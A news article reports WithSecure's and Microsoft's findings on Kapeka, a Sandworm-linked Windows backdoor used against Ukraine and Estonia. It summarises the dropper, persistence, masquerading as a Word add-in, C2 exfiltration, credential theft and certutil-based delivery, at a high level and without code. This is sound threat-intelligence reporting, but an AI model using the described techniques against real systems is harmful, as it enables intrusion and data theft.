Backdoor Kapeka: Russian APT Exploited in Attacks Against Ukraine and Estonia
Finnish cybersecurity firm WithSecure has discovered the previously undocumented Kapeka backdoor, which has been exploited for cyberattacks on Windows systems. Microsoft, which refers to it as KnuckleTouch, has noted that this flexible backdoor has been sporadically observed in cyberattacks targeting Eastern Europe, including Estonia and Ukraine, since at least mid-2022.
WithSecure has attributed the malware to the Russia-linked Advanced Persistent Threat (APT) group known as Sandworm (also known as APT44 or Seashell Blizzard).
Details of Kapeka’s Deployment
Kapeka includes a dropper designed to launch and execute a backdoor component on the infected host, after which it removes itself. The dropper also sets the backdoor’s persistence either as a scheduled task or an autostart log, depending on whether the process has System privileges.
In February 2024, Microsoft described Kapeka as being involved in multiple ransomware distribution campaigns. The backdoor, a Windows DLL written in C++, can perform various functions such as credential theft, data extraction, execution of destructive attacks, and enabling remote access for threat actors.
This DLL masquerades as a Microsoft Word add-in to appear legitimate, collects information about the compromised host, and uses multi-threading to handle incoming instructions, process them, and exfiltrate the execution results to a command and control (C2) server. The backdoor uses JSON to send and receive information from its C2, which can also update its configuration on the fly, receiving new versions from the C2 server during polling. Key features of the backdoor include reading and writing files to and from disk, launching payloads, executing shell commands, and even updating and uninstalling itself.
The Relationship Between Kapeka, GreyEnergy, and BlackEnergy
Kapeka’s connections to Sandworm are evident from conceptual and configuration overlaps with previously identified malware families such as GreyEnergy, which is considered a likely successor to the BlackEnergy toolkit, and Prestige.
How to Protect Yourself from the Kapeka Backdoor
The exact propagation method of Kapeka is currently unknown. Microsoft has indicated that the dropper is retrieved from compromised websites using the certutil utility, a technique that involves the use of a legitimate “living-off-the-land” (LOLBin) binary to orchestrate the attack.
Protective measures include keeping operating systems, software, and web applications up to date. It is also essential to adopt a proactive security posture that emphasizes awareness. Moreover, conducting thorough checks on all code is advisable.
WithSecure experts hypothesize a direct relationship between Kapeka, GreyEnergy, and the older BlackEnergy, which was also used in the attacks against Ukraine in December 2015. If this hypothesis were confirmed, analyzing these three malwares could provide vital insights into the evolution of Sandworm’s capabilities, the development techniques of the malicious code, possible reuse of code, use of third-party components developed by other Moscow-linked APTs, and the development or use of zero-day exploits.